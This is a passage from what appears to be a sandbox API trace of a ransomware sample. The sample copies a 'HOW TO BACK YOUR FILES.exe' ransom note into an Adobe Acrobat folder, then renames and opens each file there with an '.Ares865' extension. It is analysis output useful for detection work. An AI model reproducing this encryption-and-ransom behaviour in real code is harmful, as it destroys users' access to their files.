hTemplateFile=0x0) returned 0x120 [0152.643] GetLastError () returned 0x0 [0152.643] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33cfb0 [0152.643] ReadFile (in: hFile=0x120, lpBuffer=0x33cfb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33cfb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0152.644] CloseHandle (hObject=0x120) returned 1 [0152.644] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33cfb0 | out: hHeap=0x2b0000) returned 1 [0152.644] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0152.644] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7cf1a9e0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x53ab2f00, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x53ab2f00, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0152.644] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0152.644] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0152.644] lstrcpyW (in: lpString1=0x2cce464, lpString2="ActiveX" | out: lpString1="ActiveX") returned="ActiveX" [0152.644] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e78e8 [0152.644] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x74) returned 0x2c1708 [0152.644] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e78f0 | out: ListHead=0x2e7710, ListEntry=0x2e78f0) returned 0x2e78d0 [0152.644] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x53ab2f00, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x53ab2f00, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 1 [0152.644] lstrcmpiW (lpString1="HOW TO BACK YOUR FILES.exe", lpString2="HOW TO BACK YOUR FILES.exe") returned 0 [0152.645] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x53ab2f00, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x53ab2f00, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 0 [0152.645] FindClose (in: hFindFile=0x2ccee8 | out: hFindFile=0x2ccee8) returned 1 [0152.645] RtlInterlockedPopEntrySList (in: ListHead=0x2e7710 | out: ListHead=0x2e7710) returned 0x2e78f0 [0152.645] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX") returned="C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX" [0152.645] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2c1708 | out: hHeap=0x2b0000) returned 1 [0152.645] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e78e8 | out: hHeap=0x2b0000) returned 1 [0152.645] lstrlenW (lpString="C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX") returned 57 [0152.645] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX" | out: lpString1="C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX") returned="C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX" [0152.645] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0152.645] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\common files\\adobe\\acrobat\\activex\\how to back your files.exe"), bFailIfExists=1) returned 0 [0152.646] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0152.646] GetLastError () returned 0x0 [0152.646] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33cfb0 [0152.646] ReadFile (in: hFile=0x120, lpBuffer=0x33cfb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33cfb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0152.647] CloseHandle (hObject=0x120) returned 1 [0152.647] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33cfb0 | out: hHeap=0x2b0000) returned 1 [0152.647] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0152.647] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7cf1a9e0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x53be3a00, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x53be3a00, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0152.647] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0152.647] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0152.647] lstrcpyW (in: lpString1=0x2cce474, lpString2="AcroIEHelper.dll" | out: lpString1="AcroIEHelper.dll") returned="AcroIEHelper.dll" [0152.647] lstrlenW (lpString="AcroIEHelper.dll") returned 16 [0152.647] lstrlenW (lpString="Ares865") returned 7 [0152.647] lstrcmpiW (lpString1="per.dll", lpString2="Ares865") returned 1 [0152.647] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\AcroIEHelper.dll.Ares865") returned 82 [0152.648] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\AcroIEHelper.dll" (normalized: "c:\\program files (x86)\\common files\\adobe\\acrobat\\activex\\acroiehelper.dll"), lpNewFileName="C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\AcroIEHelper.dll.Ares865" (normalized: "c:\\program files (x86)\\common files\\adobe\\acrobat\\activex\\acroiehelper.dll.ares865"), dwFlags=0x1) returned 1 [0152.649] CreateFileW (lpFileName="C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\AcroIEHelper.dll.Ares865" (normalized: "c:\\program files (x86)\\common files\\adobe\\acrobat\\activex\\acroiehelper.dll.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0152.650] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=64928) returned 1 [0152.650] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0152.650] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4710 [0152.650] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0152.671] lstrcpyW (in: lpString1=0x2cce474, lpString2="AcroIEHelperShim.dll" | out: lpString1="AcroIEHelperShim.dll") returned="AcroIEHelperShim.dll" [0152.671] lstrlenW (lpString="AcroIEHelperShim.dll") returned 20 [0152.672] lstrlenW (lpString="Ares865") returned 7 [0152.672] lstrcmpiW (lpString1="him.dll", lpString2="Ares865") returned 1 [0152.672] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\AcroIEHelperShim.dll.Ares865") returned 86 [0152.672] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\AcroIEHelperShim.dll" (normalized: "c:\\program files (x86)\\common files\\adobe\\acrobat\\activex\\acroiehelpershim.dll"), lpNewFileName="C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\AcroIEHelperShim.dll.Ares865" (normalized: "c:\\program files (x86)\\common files\\adobe\\acrobat\\activex\\acroiehelpershim.dll.ares865"), dwFlags=0x1) returned 1 [0152.674] CreateFileW (lpFileName="C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\AcroIEHelperShim.dll.Ares865" (normalized: "c:\\program files (x86)\\common files\\adobe\\acrobat\\activex\\acroiehelpershim.dll.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0152.675] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=62376) returned 1 [0152.675] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0152.675] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4710 [0152.675] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0152.685] lstrcpyW (in: lpString1=0x2cce474, lpString2="AcroPDF.CAT.Ares865" | out: lpString1="AcroPDF.CAT.Ares865") returned="AcroPDF.CAT.Ares865" [0152.685] lstrlenW (lpString="AcroPDF.CAT.Ares865") returned 19 [0152.685] lstrlenW (lpString="Ares865") returned 7 [0152.685] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0152.685] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x99d45400, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x7d8ec4a0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x99d45400, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x4bc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="AcroPDF.CHS", cAlternateFileName="")) returned 1 [0152.685] lstrcmpiW (lpString1="AcroPDF.CHS", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0152.685] lstrcmpiW (lpString1="AcroPDF.CHS", lpString2="aoldtz.exe") returned -1 [0152.686] lstrcpyW (in: lpString1=0x2cce474, lpString2="AcroPDF.CHS" | out: lpString1="AcroPDF.CHS") returned="AcroPDF.CHS" [0152.686] lstrlenW (lpString="AcroPDF.CHS") returned 11 [0152.686] lstrlenW (lpString="Ares865") returned 7 [0152.686] lstrcmpiW (lpString1="PDF.CHS", lpString2="Ares865") returned 1 [0152.686] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\AcroPDF.CHS.Ares865") returned 77 [0152.686] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\AcroPDF.CHS" (normalized: "c:\\program files (x86)\\common files\\adobe\\acrobat\\activex\\acropdf.chs"), lpNewFileName="C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\AcroPDF.CHS.Ares865" (normalized: "c:\\program files (x86)\\common files\\adobe\\acrobat\\activex\\acropdf.chs.ares865"), dwFlags=0x1) returned 1 [0152.691] CreateFileW (lpFileName="C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\AcroPDF.CHS.Ares865" (normalized: "c:\\program files (x86)\\common files\\adobe\\acrobat\\activex\\acropdf.chs.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0152.691] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=310272) returned 1 [0152.691] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0152.691] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4710 [0152.691] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0152.717] lstrcpyW (in: lpString1=0x2cce474, lpString2="AcroPDF.CHT" | out: lpString1="AcroPDF.CHT") returned="AcroPDF.CHT" [0152.717] lstrlenW (lpString="AcroPDF.CHT") returned 11 [0152.717] lstrlenW (lpString="Ares865") returned 7 [0152.717] lstrcmpiW (lpString1="PDF.CHT", lpString2="Ares865") returned 1 [0152.717] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\AcroPDF.CHT.Ares865") returned 77 [0152.717] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\AcroPDF.CHT" (normalized: "c:\\program files (x86)\\common files\\adobe\\acrobat\\activex\\acropdf.cht"), lpNewFileName="C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\AcroPDF.CHT.Ares865" (normalized: "c:\\program files (x86)\\common files\\adobe\\acrobat\\activex\\acropdf.cht.ares865"), dwFlags=0x1) returned 1 [0152.719] CreateFileW (lpFileName="C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\AcroPDF.CHT.Ares865" (normalized: "c:\\program files (x86)\\common files\\adobe\\acrobat\\activex\\acropdf.cht.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0152.719] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=310272) returned 1 [0152.719] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0152.720] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4710 [0152.720] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0152.738] lstrcpyW (in: lpString1=0x2cce474, lpString2="AcroPDF.CZE" | out: lpString1="AcroPDF.CZE") returned="AcroPDF.CZE" [0152.738] lstrlenW (lpString="AcroPDF.CZE") returned 11 [0152.738] lstrlenW (lpString="Ares865") returned 7 [0152.738] lstrcmpiW (lpString1="PDF.CZE", lpString2="Ares865") returned 1 [0152.738] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\AcroPDF.CZE.Ares865") returned 77 [0152.738] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\AcroPDF.CZE" (normalized: "c:\\program files (x86)\\common files\\adobe\\acrobat\\activex\\acropdf.cze"), lpNewFileName="C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\AcroPDF.CZE.Ares865" (normalized: "c:\\program files (x86)\\common files\\adobe\\acrobat\\activex\\acropdf.cze.ares865"), dwFlags=0x1) returned 1 [0152.740] CreateFileW (lpFileName="C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\AcroPDF.CZE.Ares865" (normalized: "c:\\program files (x86)\\common files\\adobe\\acrobat\\activex\\acropdf.cze.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0152.740] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=312320) returned 1 [0152.740] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0152.740] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4710 [0152.740] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0152.759] lstrcpyW (in: lpString1=0x2cce474, lpString2="AcroPDF.DAN" | out: lpString1="AcroPDF.DAN") returned="AcroPDF.DAN" [0152.759] lstrlenW (lpString="AcroPDF.DAN") returned 11 [0152.759] lstrlenW (lpString="Ares865") returned 7 [0152.759] lstrcmpiW (lpString1="PDF.DAN", lpString2="Ares865") returned 1 [0152.760] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\AcroPDF.DAN.Ares865") returned 77 [0152.760] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\AcroPDF.DAN" (normalized: "c:\\program files (x86)\\common files\\adobe\\acrobat\\activex\\acropdf.dan"), lpNewFileName="C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\AcroPDF.DAN.Ares865" (normalized: "c:\\program files (x86)\\common files\\adobe\\acrobat\\activex\\acropdf.dan.ares865"), dwFlags=0x1) returned 1 [0152.762] CreateFileW (lpFileName="C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\AcroPDF.DAN.Ares865" (normalized: "c:\\program files (x86)\\common files\\adobe\\acrobat\\activex\\acropdf.dan.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0152.762] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=312320) returned 1 [0152.762] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0152.762] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4710 [0152.762] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0152.783] lstrcpyW (in: lpString1=0x2cce474, lpString2="AcroPDF.DEU" | out: lpString1="AcroPDF.DEU") returned="AcroPDF.DEU" [0152.783] lstrlenW (lpString="AcroPDF.DEU") returned 11 [0152.783] lstrlenW (lpString="Ares865") returned 7 [0152.783] lstrcmpiW (lpString1="PDF.DEU", lpString2="Ares865") returned 1 [0152.783] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\AcroPDF.DEU.Ares865") returned 77 [0152.783] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\AcroPDF.DEU" (normalized: "c:\\program files (x86)\\common files\\adobe\\acrobat\\activex\\acropdf.deu"), lpNewFileName="C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\AcroPDF.DEU.Ares865" (normalized: "c:\\program files (x86)\\common files\\adobe\\acrobat\\activex\\acropdf.deu.ares865"), dwFlags=0x1) returned 1 [0152.785] CreateFileW (lpFileName="C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\AcroPDF.DEU.Ares865" (normalized: "c:\\program files (x86)\\common files\\adobe\\acrobat\\activex\\acropdf.deu.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0152.785] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=312832) returned 1 [0152.785] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0152.786] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4710 [0152.786] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0152.804] lstrcpyW (in: lpString1=0x2cce474, lpString2="AcroPDF.dll" | out: lpString1="AcroPDF.dll") returned="AcroPDF.dll" [0152.804] lstrlenW (lpString="AcroPDF.dll") returned 11 [0152.804] lstrlenW (lpString="Ares865") returned 7 [0152.804] lstrcmpiW (lpString1="PDF.dll", lpString2="Ares865") returned 1 [0152.805] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\AcroPDF.dll.Ares865") returned 77 [0152.805] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\AcroPDF.dll" (normalized: "c:\\program files (x86)\\common files\\adobe\\acrobat\\activex\\acropdf.dll"), lpNewFileName="C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\AcroPDF.dll.Ares865" (normalized: "c:\\program files (x86)\\common files\\adobe\\acrobat\\activex\\acropdf.dll.ares865"), dwFlags=0x1) returned 1 [0152.806] CreateFileW (lpFileName="C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\AcroPDF.dll.Ares865" (normalized: "c:\\program files (x86)\\common files\\adobe\\acrobat\\activex\\acropdf.dll.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0152.807] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=702352) returned 1 [0152.807] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0152.807] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4710 [0152.807] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0152.844] lstrcpyW (in: lpString1=0x2cce474, lpString2="AcroPDF.ESP" | out: lpString1="AcroPDF.ESP") returned="AcroPDF.ESP" [0152.844] lstrlenW (lpString="AcroPDF.ESP") returned 11 [0152.844] lstrlenW (lpString="Ares865") returned 7 [0152.844] lstrcmpiW (lpString1="PDF.ESP", lpString2="Ares865") returned 1 [0152.844] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\AcroPDF.ESP.Ares865") returned 77 [0152.844] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\AcroPDF.ESP" (normalized: "c:\\program files (x86)\\common files\\adobe\\acrobat\\activex\\acropdf.esp"), lpNewFileName="C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\AcroPDF.ESP.Ares865" (normalized: "c:\\program files (x86)\\common files\\adobe\\acrobat\\activex\\acropdf.esp.ares865"), dwFlags=0x1) returned 1 [0152.847] CreateFileW (lpFileName="C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\AcroPDF.ESP.Ares865" (normalized: "c:\\program files (x86)\\common files\\adobe\\acrobat\\activex\\acropdf.esp.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0152.847] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=312832) returned 1 [0152.847] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0152.847] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4710 [0152.847] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0152.868] lstrcpyW (in: lpString1=0x2cce474, lpString2="AcroPDF.EUQ" | out: lpString1="AcroPDF.EUQ") returned="AcroPDF.EUQ" [0152.868] lstrlenW (lpString="AcroPDF.EUQ") returned 11 [0152.868] lstrlenW (lpString="Ares865") returned 7 [0152.868] lstrcmpiW (lpString1="PDF.EUQ", lpString2="Ares865") returned 1 [0152.868] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\AcroPDF.EUQ.Ares865") returned 77 [0152.868] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\AcroPDF.EUQ" (normalized: "c:\\program files (x86)\\common files\\adobe\\acrobat\\activex\\acropdf.euq"), lpNewFileName="C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\AcroPDF.EUQ.Ares865" (normalized: "c:\\program files (x86)\\common files\\adobe\\acrobat\\activex\\acropdf.euq.ares865"), dwFlags=0x1) returned 1 [0152.871] CreateFileW (lpFileName="C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\AcroPDF.EUQ.Ares865" (normalized: "c:\\program files (x86)\\common files\\adobe\\acrobat\\activex\\acropdf.euq.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0152.871] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=312320) returned 1 [0152.871] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0152.871] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4710 [0152.871] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0152.890] lstrcpyW (in: lpString1=0x2cce474, lpString2="AcroPDF.FRA" | out: lpString1="AcroPDF.FRA") returned="AcroPDF.FRA" [0152.890] lstrlenW (lpString="AcroPDF.FRA") returned 11 [0152.890] lstrlenW (lpString="Ares865") returned 7 [0152.890] lstrcmpiW (lpString1="PDF.FRA", lpString2="Ares865") returned 1 [0152.890] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\AcroPDF.FRA.Ares865") returned 77 [0152.890] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\AcroPDF.FRA" (normalized: "c:\\program files (x86)\\common files\\adobe\\acrobat\\activex\\acropdf.fra"), lpNewFileName="C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\AcroPDF.FRA.Ares865" (normalized: "c:\\program files (x86)\\common files\\adobe\\acrobat\\activex\\acropdf.fra.ares865"), dwFlags=0x1) returned 1 [0152.893] CreateFileW (lpFileName="C:\\Program Files 